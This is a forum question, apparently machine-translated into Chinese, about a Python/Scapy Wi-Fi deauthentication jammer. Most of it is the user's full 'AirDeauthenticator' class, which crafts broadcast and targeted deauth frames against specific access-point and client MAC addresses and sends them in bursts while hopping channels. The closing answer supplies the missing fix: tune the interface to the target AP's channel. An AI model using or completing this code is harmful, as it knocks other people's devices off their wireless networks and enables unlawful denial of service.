所以我一直在尝试使用Scapy让这个Wifi干扰器工作。
我遵循了这个非常简单的教程,这应该足以工作:https://www.youtube.com/watch?v=NKqG_i6qMJM
这没有工作,尽管我得到相同的输出。
然后我发现了这个项目:https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py
执行一些自动扫描和通道跳转来填充一些变量。如果我运行它,它工作得很好。
所以我想出了我自己的代码,我认为一切都可以工作,但不知何故,好像什么都没有发生,尽管所有的输出似乎都很好。
这是我的AirJammer类(不能让代码在这里正确缩进,但在我的实际项目中是正确的):
class AirDeauthenticator(object):
def __init__(self):
self.deauth_running = False
self.running_interface = None
self.deauth_thread = None
self.channel_hopper_thread = None
self.channel_lock = Lock()
self.current_channel = 3
self.targeted_only = False # Flag if we only want to perform targeted deauthentication attacks
self._burst_count = 500 # Number of sequential deuathentication packet bursts to send
self._bssids_to_deauth = [] # MAC addresses of APs, used to send deauthentication packets to broadcast
self._clients_to_deauth = {} # Pairs clients to their connected AP to send targeted deauthentication attacks
def add_bssid(self, bssid):
self._bssids_to_deauth.append(bssid)
def add_client(self, client, bssid):
self._clients_to_deauth[client] = bssid
def set_burst_count(self, count):
self._burst_count = count
def hop_channels(self, interface, hop_interval):
while self.deauth_running:
print self.current_channel
Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
with self.channel_lock:
self.current_channel += 1
if self.current_channel > 11:
self.current_channel = 1
sleep(hop_interval)
def deauthentication_attack(self, interface):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self.targeted_only:
for bssid in self._bssids_to_deauth:
deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet)
for client in self._clients_to_deauth.keys():
bssid = self._clients_to_deauth[client]
deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print "N Packets: {}n".format(len(packets))
while count >= 0:
for packet in packets:
packet.show()
send(packet, iface = interface, count = 1, inter = 0)
count -= 1
self.deauth_running = False
self.running_interface = None
def start_deauthentication_attack(self, interface, hop_interval=5):
self.running_interface = interface
self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
self.deauth_running = True
self.deauth_thread.start()
self.channel_hopper_thread.start()
deauthor = AirDeauthenticator()
deauthor.add_bssid('00:04:CA:AC:E9:22')
deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
deauthor.start_deauthentication_attack('wlan1')
输出看起来很好,尽管我从scapy得到了这个警告:.警告:没有找到到达目的地的Mac地址。使用广播。.警告:没有找到更多到达目的地的Mac地址。使用广播。
但是我在wifijammer.py工具上看到了相同的输出,并且该工具仍然可以工作。
当我试图发送这些数据包时,还有什么我需要关注的吗?
我试过把界面调到监控模式,但还是不行。
就我所能调试的而言,问题确实存在于警告消息中。如果我拔掉usb-wifi棒并重新插上它,如果第一次没有出现此错误,如果我重复此过程,它仍然会出现。
当我使用wifijammer.py工具时没有发生这种情况,但是我反复分析了代码,并没有发现任何可以避免这种严重问题的设置机制。
问题出在wifi频道上。
要使其工作,必须将wifi通道设置为与AP相同(客户端也将在相同的通道上)。
如果没有这个,数据包将在目标设备未监听的另一个频率上发送。